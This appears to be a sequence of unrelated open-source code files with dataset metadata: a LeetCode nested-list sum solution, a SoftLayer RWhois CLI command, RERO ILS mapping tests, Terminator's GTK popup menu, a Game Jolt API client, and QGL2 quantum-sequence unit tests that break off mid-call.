* // @return the single integer that this NestedInteger holds, if it holds a single integer
* // Return null if this NestedInteger holds a nested list
* public Integer getInteger();
*
* // @return the nested list that this NestedInteger holds, if it holds a nested list
* // Return null if this NestedInteger holds a single integer
* public List<NestedInteger> getList();
* }
*/
1. DFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
return dfs(nestedList, 1);
}
public int dfs(List<NestedInteger> nestedList, int depth) {
int sum = 0;
for (NestedInteger e : nestedList) {
sum += e.isInteger() ? e.getInteger() * depth : dfs(e.getList(), depth + 1);
}
return sum;
}
}
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
for (NestedInteger ni : nestedList) {
sum += depthSum(ni, 1);
}
return sum;
}
private int depthSum(NestedInteger ni, int depth) {
if (ni.isInteger()) {
return ni.getInteger() * depth;
} else {
int sum = 0;
for (NestedInteger n : ni.getList()) {
sum += depthSum(n, depth + 1);
}
return sum;
}
}
}
2. BFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
Queue<NestedInteger> queue = new LinkedList<>();
int depth = 1;
for (NestedInteger ni : nestedList) {
queue.add(ni);
}
while (!queue.isEmpty()) {
int size = queue.size();
while (size-- > 0) {
NestedInteger cur = queue.poll();
if (cur.isInteger()) {
sum += cur.getInteger() * depth;
} else {
for (NestedInteger ni : cur.getList()) {
queue.add(ni);
}
}
}
depth++;
}
return sum;
}
}
'''
|
JulyKikuAkita/PythonPrac
|
cs15211/NestedListWeightSum.py
|
Python
|
apache-2.0
| 4,780 | 0.004603 |
"""Edit the RWhois data on the account."""
# :license: MIT, see LICENSE for more details.
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
import click
@click.command()
@click.option('--abuse', help='Set the abuse email address')
@click.option('--address1', help='Update the address 1 field')
@click.option('--address2', help='Update the address 2 field')
@click.option('--city', help='Set the city name')
@click.option('--company', help='Set the company name')
@click.option('--country', help='Set the two-letter country code')
@click.option('--firstname', help='Update the first name field')
@click.option('--lastname', help='Update the last name field')
@click.option('--postal', help='Set the postal code field')
@click.option('--public/--private',
default=None,
help='Flags the address as a public or private residence.')
@click.option('--state', help='Set the two-letter state code')
@environment.pass_env
def cli(env, abuse, address1, address2, city, company, country, firstname,
lastname, postal, public, state):
"""Edit the RWhois data on the account."""
mgr = SoftLayer.NetworkManager(env.client)
update = {
'abuse_email': abuse,
'address1': address1,
'address2': address2,
'company_name': company,
'city': city,
'country': country,
'first_name': firstname,
'last_name': lastname,
'postal_code': postal,
'state': state,
'private_residence': public,
}
if public is True:
update['private_residence'] = False
elif public is False:
update['private_residence'] = True
check = [x for x in update.values() if x is not None]
if not check:
raise exceptions.CLIAbort(
"You must specify at least one field to update.")
mgr.edit_rwhois(**update)
|
briancline/softlayer-python
|
SoftLayer/CLI/rwhois/edit.py
|
Python
|
mit
| 1,891 | 0 |
# -*- coding: utf-8 -*-
#
# RERO ILS
# Copyright (C) 2019 RERO
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Libraries elasticsearch mapping tests."""
from utils import get_mapping
from rero_ils.modules.locations.api import Location, LocationsSearch
def test_location_es_mapping(es, db, loc_public_martigny_data,
lib_martigny, org_martigny):
"""Test library elasticsearch mapping."""
search = LocationsSearch()
mapping = get_mapping(search.Meta.index)
assert mapping
loc = Location.create(
loc_public_martigny_data, dbcommit=True, reindex=True, delete_pid=True)
new_mapping = get_mapping(search.Meta.index)
assert mapping == new_mapping
loc.delete(force=True, dbcommit=True, delindex=True)
def test_location_search_mapping(app, locations_records):
"""Test library search mapping."""
search = LocationsSearch()
c = search.query('match', code='MARTIGNY-PUBLIC').count()
assert c == 1
c = search.query('match', code='SAXON-PUBLIC').count()
assert c == 1
|
rero/reroils-app
|
tests/ui/locations/test_locations_mapping.py
|
Python
|
gpl-2.0
| 1,616 | 0 |
#!/usr/bin/env python2
# Terminator by Chris Jones <cmsj@tenshu.net>
# GPL v2 only
"""terminal_popup_menu.py - classes necessary to provide a terminal context
menu"""
import string
from gi.repository import Gtk
from version import APP_NAME
from translation import _
from encoding import TerminatorEncoding
from terminator import Terminator
from util import err, dbg
from config import Config
from prefseditor import PrefsEditor
import plugin
class TerminalPopupMenu(object):
"""Class implementing the Terminal context menu"""
terminal = None
terminator = None
config = None
def __init__(self, terminal):
"""Class initialiser"""
self.terminal = terminal
self.terminator = Terminator()
self.config = Config()
def show(self, widget, event=None):
"""Display the context menu"""
terminal = self.terminal
menu = Gtk.Menu()
self.popup_menu = menu
url = None
button = None
time = None
self.config.set_profile(terminal.get_profile())
if event:
url = terminal.vte.match_check_event(event)
button = event.button
time = event.time
else:
time = 0
button = 3
if url and url[0]:
dbg("URL matches id: %d" % url[1])
if not url[1] in terminal.matches.values():
err("Unknown URL match id: %d" % url[1])
dbg("Available matches: %s" % terminal.matches)
nameopen = None
namecopy = None
if url[1] == terminal.matches['email']:
nameopen = _('_Send email to...')
namecopy = _('_Copy email address')
elif url[1] == terminal.matches['voip']:
nameopen = _('Ca_ll VoIP address')
namecopy = _('_Copy VoIP address')
elif url[1] in terminal.matches.values():
# This is a plugin match
for pluginname in terminal.matches:
if terminal.matches[pluginname] == url[1]:
break
dbg("Found match ID (%d) in terminal.matches plugin %s" %
(url[1], pluginname))
registry = plugin.PluginRegistry()
registry.load_plugins()
plugins = registry.get_plugins_by_capability('url_handler')
for urlplugin in plugins:
if urlplugin.handler_name == pluginname:
dbg("Identified matching plugin: %s" %
urlplugin.handler_name)
nameopen = _(urlplugin.nameopen)
namecopy = _(urlplugin.namecopy)
break
if not nameopen:
nameopen = _('_Open link')
if not namecopy:
namecopy = _('_Copy address')
icon = Gtk.Image.new_from_stock(Gtk.STOCK_JUMP_TO,
Gtk.IconSize.MENU)
item = Gtk.ImageMenuItem.new_with_mnemonic(nameopen)
item.set_property('image', icon)
item.connect('activate', lambda x: terminal.open_url(url, True))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(namecopy)
item.connect('activate',
lambda x: terminal.clipboard.set_text(terminal.prepare_url(url), len(terminal.prepare_url(url))))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Copy'))
item.connect('activate', lambda x: terminal.vte.copy_clipboard())
item.set_sensitive(terminal.vte.get_has_selection())
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Paste'))
item.connect('activate', lambda x: terminal.paste_clipboard())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split H_orizontally'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_horiz', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-horiz',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split V_ertically'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_vert', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-vert',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Tab'))
item.connect('activate', lambda x: terminal.emit('tab-new', False,
terminal))
menu.append(item)
if self.terminator.debug_address is not None:
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Debug Tab'))
item.connect('activate', lambda x:
terminal.emit('tab-new', True, terminal))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Close'))
item.connect('activate', lambda x: terminal.close())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
sensitive = not terminal.get_toplevel() == terminal.get_parent()
item = Gtk.MenuItem.new_with_mnemonic(_('_Zoom terminal'))
item.connect('activate', terminal.zoom)
item.set_sensitive(sensitive)
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Ma_ximize terminal'))
item.connect('activate', terminal.maximise)
item.set_sensitive(sensitive)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
else:
item = Gtk.MenuItem.new_with_mnemonic(_('_Restore all terminals'))
item.connect('activate', terminal.unzoom)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if self.config['show_titlebar'] == False:
item = Gtk.MenuItem.new_with_mnemonic(_('Grouping'))
submenu = self.terminal.populate_group_menu()
submenu.show_all()
item.set_submenu(submenu)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.CheckMenuItem.new_with_mnemonic(_('Show _scrollbar'))
item.set_active(terminal.scrollbar.get_property('visible'))
item.connect('toggled', lambda x: terminal.do_scrollbar_toggle())
menu.append(item)
        item = Gtk.CheckMenuItem.new_with_mnemonic(_('Toggle tab visibility'))
        item.set_active(self.config['tab_position'] != 'hidden')
item.connect('toggled', self.toggle_tab_visibility)
menu.append(item)
if hasattr(Gtk, 'Builder'): # VERIFY FOR GTK3: is this ever false?
item = Gtk.MenuItem.new_with_mnemonic(_('_Preferences'))
item.connect('activate', lambda x: PrefsEditor(self.terminal))
menu.append(item)
profilelist = sorted(self.config.list_profiles(), key=string.lower)
if len(profilelist) > 1:
item = Gtk.MenuItem.new_with_mnemonic(_('Profiles'))
submenu = Gtk.Menu()
item.set_submenu(submenu)
menu.append(item)
current = terminal.get_profile()
group = None
for profile in profilelist:
profile_label = profile
if profile_label == 'default':
profile_label = profile.capitalize()
item = Gtk.RadioMenuItem(profile_label, group)
if profile == current:
item.set_active(True)
item.connect('activate', terminal.force_set_profile, profile)
submenu.append(item)
self.add_encoding_items(menu)
try:
menuitems = []
registry = plugin.PluginRegistry()
registry.load_plugins()
plugins = registry.get_plugins_by_capability('terminal_menu')
for menuplugin in plugins:
menuplugin.callback(menuitems, menu, terminal)
if len(menuitems) > 0:
menu.append(Gtk.SeparatorMenuItem())
for menuitem in menuitems:
menu.append(menuitem)
except Exception, ex:
err('TerminalPopupMenu::show: %s' % ex)
menu.show_all()
menu.popup(None, None, None, None, button, time)
return(True)
def toggle_tab_visibility(self, widget):
"""tab visibility"""
status = self.config['tab_position']
old_tab_position = self.config['old_tab_position']
if status == 'hidden':
if old_tab_position:
                # restore the saved position; with no saved position,
                # hidden stays the default
self.config['tab_position'] = old_tab_position
self.config.save()
else:
self.config['old_tab_position'] = status
self.config['tab_position'] = 'hidden'
self.config.save()
terminator = Terminator()
terminator.reconfigure()
def add_encoding_items(self, menu):
"""Add the encoding list to the menu"""
terminal = self.terminal
active_encodings = terminal.config['active_encodings']
item = Gtk.MenuItem.new_with_mnemonic(_("Encodings"))
menu.append (item)
submenu = Gtk.Menu ()
item.set_submenu (submenu)
encodings = TerminatorEncoding ().get_list ()
encodings.sort (lambda x, y: cmp (x[2].lower (), y[2].lower ()))
current_encoding = terminal.vte.get_encoding ()
group = None
if current_encoding not in active_encodings:
active_encodings.insert (0, _(current_encoding))
for encoding in active_encodings:
if encoding == terminal.default_encoding:
extratext = " (%s)" % _("Default")
elif encoding == current_encoding and \
terminal.custom_encoding == True:
extratext = " (%s)" % _("User defined")
else:
extratext = ""
radioitem = Gtk.RadioMenuItem (_(encoding) + extratext, group)
if encoding == current_encoding:
radioitem.set_active (True)
if group is None:
group = radioitem
radioitem.connect ('activate', terminal.on_encoding_change,
encoding)
submenu.append (radioitem)
item = Gtk.MenuItem.new_with_mnemonic(_("Other Encodings"))
submenu.append (item)
        # second level
submenu = Gtk.Menu ()
item.set_submenu (submenu)
group = None
for encoding in encodings:
if encoding[1] in active_encodings:
continue
if encoding[1] is None:
label = "%s %s" % (encoding[2], terminal.vte.get_encoding ())
else:
label = "%s %s" % (encoding[2], encoding[1])
radioitem = Gtk.RadioMenuItem (label, group)
if group is None:
group = radioitem
if encoding[1] == current_encoding:
radioitem.set_active (True)
radioitem.connect ('activate', terminal.on_encoding_change,
encoding[1])
submenu.append (radioitem)
|
wpjunior/terminator
|
terminatorlib/terminal_popup_menu.py
|
Python
|
gpl-2.0
| 11,983 | 0.004423 |
# Game Jolt Trophy for Python
# by viniciusepiplon - vncastanheira@gmail.com
# version 1.1
# Python 3.x stable
# Python 2.7 unstable
# This is a general Python module for manipulating user data and
# trophies (achievements) on GameJolt.
# Website: www.gamejolt.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/lgpl.txt>.
import sys
import hashlib
import json
if sys.hexversion > 0x03000000:
try:
import urllib.request
except:
raise ImportError
else:
try:
import urllib
except:
raise ImportError
class GameJoltTrophy(object):
"""
    The class constructor.
    The class requires four essential parameters: user name, user token, game ID
    and private key. Check the API documentation on Game Jolt's website to see
    what those parameters are. In this code, I used the same names as on the
    site. If you read it, you can understand what's going on here.
Note that *username* and *user token* can be changed later, but the game id
and the private key must be defined first, as they won't change.
"""
def __init__(self, username, user_token, game_id, private_key):
super(GameJoltTrophy, self).__init__()
self.username = username
self.user_token = user_token
self.game_id = game_id
self.private_key = private_key
self.URL = 'http://gamejolt.com/api/game/v1'
self.nativeTraceback = False
#====== TOOLS ======#
# Used for changing users, setting and/or fixing authentications
def changeUsername(self, username):
"""
Changes the *username* contained on the object
Used for changing, setting and/or fixing authentications
"""
self.username = username
#
def changeUserToken(self, user_token):
"""
Changes the *user token* contained on the object
Used for changing, setting and/or fixing authentications
"""
self.user_token = user_token
def setSignatureAndgetJSONResponse(self, URL):
"""
Generates a signature from the url and returns the same address, with the
signature added to it.
        All signatures are generated with md5, but can be modified below.
This is the only function that generates the signature, so changing the
encoding to SHA1 or other format will affect all URL requests.
"""
if sys.hexversion > 0x03000000:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.request.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
else:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
def setNativeTraceback(self, value):
        if type(value) == bool: self.nativeTraceback = value
        else: raise TypeError
#====== USERS ======#
def fetchUserInfo(self):
"""
        Fetches the info of a user as a dictionary.
**ATTENTION**: it returns a dictionary type value with the key *users*,
containing the user being fetched.
        Right now it only fetches the user stored in the object; fetching a
        list of users is not available yet and will be implemented later.
"""
URL = self.URL+'/users/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)
return self.setSignatureAndgetJSONResponse(URL)
def authenticateUser(self):
"""
Authenticate a user defined in the object variable.
        The purpose of this method is to check if the user's credentials
        (name and token) are valid. If so, you're safe to call the other
        methods.
        Returns a boolean value.
"""
URL = self.URL+'/users/auth/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)+\
'&'+'user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
#====== TROPHIES ======#
def fetchTrophy(self, achieved=None, trophy=None):
"""
        The 'trophy' argument receives a single trophy ID or a list of trophy
        IDs to be returned. When it is used, the 'achieved' argument is
        ignored, so pass a 'None' value to it.
If 'achieved' is:
> set to True, only the achieved trophies will be returned
> set to False, only trophies that the user hasn't achieved yet will be
returned
> set to None (no argument is passed), then all trophies will be retrieved
"""
URL = self.URL+'/trophies/?format=json&'+\
'game_id='+str(self.game_id)+'&'+'username='+str(self.username)+'&'+'user_token='+str(self.user_token)
if achieved != None:
URL += '&achieved='
if achieved == True: URL += 'true'
if achieved == False: URL += 'false'
else:
if trophy != None:
if type(trophy) == int:
URL += '&trophy_id='+str(trophy)+'&'
elif type(trophy) == list:
miniurl = '&trophy_id='
for t in trophy:
miniurl += str(t)+','
                    miniurl = miniurl[:-1]  # drop the trailing comma
URL += miniurl
else:
raise 'Invalid type for trophy: must be int or list.'
return self.setSignatureAndgetJSONResponse(URL)
def addAchieved(self, trophy_id):
"""
Sets a winning trophy for the user.
If the parameters are valid, returns True. Otherwise, it returns False.
"""
URL = self.URL+'/trophies/add-achieved/?'+\
'game_id='+str(self.game_id)+'&'+'user_token='+str(self.user_token)+'&'+'username='+str(self.username)+\
'&'+'trophy_id='+str(trophy_id)
try:
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
except Exception as error:
return {'success': 'false', 'message': str(error)}
#====== SCORES ======#
def fetchScores(self, limit=10, table_id=None, user_info_only=False):
"""
The *limit* argument is set to 10 by default, but can't be more than 100. If
        you pass a higher number, the method automatically clamps it to the
        maximum of 100.
        *table_id* is for returning scores for a specific table. If no argument
        is passed (None), it will return all the tables available.
If *user_info_only* is set to True, only scores for the player stored on the
object will be returned.
"""
URL = self.URL+'/scores/?format=json&game_id='+str(self.game_id)
if user_info_only:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
# ID of the score table
if table_id:
URL += '&table_id='+str(table_id)
# Maximum number of scores should be 100 according with the GJAPI
if limit > 100:
limit = 100
URL += '&limit='+str(limit)
return self.setSignatureAndgetJSONResponse(URL)
def addScores(self, score, sort, table_id=None, extra_data='', guest=False, guestname=''):
"""
This method adds a score to the player or guest.
*score* is a string value describing the score value.
*sort* is the actual score value, a number value. But can be a string too.
For *table_id*, check the fetchScores method.
*extra_data* is a string value with any data you would like to store. It
doesn't appear on the site.
        If you want to store a score for a guest instead of the user:
        > set the 'guest' parameter to True.
        > set 'guestname' to a string with the name of the guest.
"""
URL = self.URL+'/scores/add/?format=json&game_id='+str(self.game_id)+\
'&score='+str(score)+'&sort='+str(sort)
if not guest:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
else:
URL += '&guest='+str(guestname)
if extra_data:
URL += '&extra_data='+extra_data
if table_id:
URL += '&table_id='+str(table_id)
return self.setSignatureAndgetJSONResponse(URL)
def scoreTable(self):
""" Returns the tables containing the high scores for the game."""
URL = self.URL+'/scores/tables/?format=json&game_id='+str(self.game_id)
return self.setSignatureAndgetJSONResponse(URL)
#====== SESSIONS ======#
def openSession(self):
"""
Opens a game session for a particular user. Allows you to tell Game Jolt
that a user is playing your game. You must ping the session
(**pingSession** method) to keep it active and you must close it when you're
done with it. Note that you can only have one open session at a time.
If you try to open a new session while one is running, the system will close
out your current session before opening a new one.
        Return a boolean value: True if the session opened with success, False otherwise.
"""
URL = self.URL+'/sessions/open/?format=json&game_id='+str(self.game_id)+\
'&username='+str(self.username)+'&user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
def closeSession(self):
"""
        Closes the active session.
        Return a boolean value: True if the session closed with success, False otherwise.
"""
URL = self.URL+'/sessions/close/?format=json&game_id='+str(self.game_id)+\
'&username='+str(self.username)+'&user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
def pingSession(self, active=True):
"""
Pings an open session to tell the system that it's still active. If the
session hasn't been pinged within 120 seconds, the system will close the
session and you will have to open another one. It's recommended that you
ping every 30 seconds or so to keep the system from cleaning up your session.
You can also let the system know whether the player is in an "active" or
"idle" state within your game through this call. To do this, you pass an
argument to the *active* variable. If it is set to True, then the player
state will be set to **active**. If False, it will be set to **idle**.
        Return a boolean value: True if the session pinged with success, False otherwise.
"""
URL = self.URL+'/sessions/ping/?format=json&game_id='+str(self.game_id)+\
'&username='+str(self.username)+'&user_token='+str(self.user_token)
if active: URL += '&status=active'
else: URL += '&status=idle'
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
#====== DATA STORAGE ==#
def fetchData(self, key, user_info_only=False):
"""
Return the data stored.
The *key* variable is the identification value for the particular data you
want to retrieve.
        If you want to return data only for the user stored in the object, set
        the last argument to True.
Returns a dictionary containing the data.
"""
URL = self.URL+'/data-store/?format=json&game_id='+str(self.game_id)+\
'&key='+str(key)
if user_info_only:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
return self.setSignatureAndgetJSONResponse(URL)
def storeData(self, key, data, user_info_only=False):
"""
        Stores a piece of data.
        The *key* argument defines the identifier of the data.
        The *data* argument is the data itself, of string type.
        To store the data only for the user held in this object, set the last
        argument to True.
        Returns a boolean value: True if the data was stored successfully, False
        otherwise.
"""
URL = self.URL+'/data-store/set/?format=json&game_id='+str(self.game_id)+\
'&key='+str(key)+'&data='+str(data)
if user_info_only:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
def removeData(self, key):
"""
        Removes the data with the given key.
        *key* is the data identifier.
        Returns a boolean value: True if the data was removed successfully, False
        otherwise.
"""
URL = self.URL+'/data-store/remove/?format=json'+'&game_id='+str(self.game_id)+'&key='+str(key)
        return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
def getDataKeys(self):
"""
        Returns all the available keys.
        The return type is a dictionary object with a list of dictionaries. Each of
        those dictionaries contains a key named **key** holding its value.
        Example:
{'keys': [{'key': '1'}, {'key': '2'}, ...], 'success': 'true' }
"""
URL = self.URL+'/data-store/get-keys/?format=json'+'&game_id='+str(self.game_id)
return self.setSignatureAndgetJSONResponse(URL)
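# A minimal usage sketch (illustrative; the client class and its constructor
# are defined earlier in this file, so the names below are assumptions):
#
#     import time
#     gj = GameJoltTrophy(username, user_token, game_id, private_key)
#     if gj.openSession():
#         gj.storeData('highscore', '1200', user_info_only=True)
#         print(gj.fetchData('highscore', user_info_only=True))
#         time.sleep(30)
#         gj.pingSession(active=True)  # ping within 120 s to keep it alive
#         gj.closeSession()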
|
yaelatletl/gj_e3d_api
|
py_gjapi.py
|
Python
|
lgpl-3.0
| 13,032 | 0.028392 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009, 2013 Zuza Software Foundation
#
# This file is part of Pootle.
#
# Pootle is free software; you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# Pootle is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# Pootle; if not, see <http://www.gnu.org/licenses/>.
from django import template
register = template.Library()
@register.inclusion_tag('terminology/term_edit.html', takes_context=True)
def render_term_edit(context, form):
template_vars = {
'unit': form.instance,
'form': form,
'language': context['language'],
'source_language': context['source_language'],
}
return template_vars
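# Example template usage (illustrative; assumes the rendering context provides
# 'language' and 'source_language'):
#
#     {% load terminology_tags %}
#     {% render_term_edit form %}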
|
arky/pootle-dev
|
pootle/apps/pootle_terminology/templatetags/terminology_tags.py
|
Python
|
gpl-2.0
| 1,119 | 0 |
# Copyright 2016 by Raytheon BBN Technologies Corp. All Rights Reserved.
'''
Test the qgl2/basic_sequences to ensure they replicate the QGL1 functionality.
'''
import datetime
import unittest
import numpy as np
from math import pi
import random
from pyqgl2.main import compile_function
from pyqgl2.qreg import QRegister
from QGL import *
from test.helpers import testable_sequence, \
channel_setup, assertPulseSequenceEqual, \
get_cal_seqs_1qubit, get_cal_seqs_2qubits, \
stripWaitBarrier, flattenPulseBlocks
class TestAllXY(unittest.TestCase):
def setUp(self):
channel_setup()
def test_AllXY(self):
# QGL1 uses QubitFactory, QGL2 uses QRegister
q1 = QubitFactory('q1')
qr = QRegister(q1)
# Specify the QGL1 we expect QGL2 to generate
# Note in this case we specify only a sample of the start
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)), # aka init(q1) aka Wait(q1)
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
# To turn on verbose logging in compile_function
# from pyqgl2.ast_util import NodeError
# from pyqgl2.debugmsg import DebugMsg
# NodeError.MUTE_ERR_LEVEL = NodeError.NODE_ERROR_NONE
# DebugMsg.set_level(0)
# Now compile the QGL2 to produce the function that would generate the expected sequence.
# Supply the path to the QGL2, the main function in that file, and a list of the args to that function.
# Can optionally supply saveOutput=True to save the qgl1.py
# file,
# and intermediate_output="path-to-output-file" to save
# intermediate products
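        # For example (hypothetical output path; kwargs as described above):
        #   resFunction = compile_function(
        #       "src/python/qgl2/basic_sequences/AllXY.py", "AllXY", (qr,),
        #       saveOutput=True,
        #       intermediate_output="/tmp/AllXY_intermediate.py")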
resFunction = compile_function("src/python/qgl2/basic_sequences/AllXY.py",
"AllXY",
(qr,))
# Run the QGL2. Note that the generated function takes no arguments itself
seqs = resFunction()
# Transform the returned sequences into the canonical form for comparing
# to the explicit QGL1 version above.
# EG, 'flatten' any embedded lists of sequences.
seqs = testable_sequence(seqs)
# Assert that the QGL1 is the same as the generated QGL2
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# Tests list of lists of function references, instead of sub-functions
def test_AllXY_alt1(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
def test_AllXY_alt2(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY2",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# BlankingSweeps are OBE, so not tested
class TestCR(unittest.TestCase):
def setUp(self):
channel_setup()
def test_PiRabi(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
controlQR = QRegister(controlQ)
targetQR = QRegister(targetQ)
edge = EdgeFactory(controlQ, targetQ)
lengths = np.linspace(0, 4e-6, 11)
riseFall=40e-9
amp=1
phase=0
calRepeats = 2
expected_seq = []
# Seq1
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
calseq = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += calseq
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"PiRabi", (controlQR, targetQR, lengths, riseFall, amp, phase, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
def test_EchoCRLen(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
cR = QRegister('q1') # Equivalent to QRegister(controlQ)
tR = QRegister('q2')
# FIXME: Better values!?
lengths = np.linspace(0, 2e-6, 11)
riseFall=40e-9
amp=1
phase=0
calRepeats=2
canc_amp=0
canc_phase=np.pi/2
expected_seq = []
# Seq1
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Id(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
cal_seqs = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += cal_seqs
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"EchoCRLen",
(cR, tR, lengths, riseFall, amp, phase, calRepeats, canc_amp, canc_phase) )
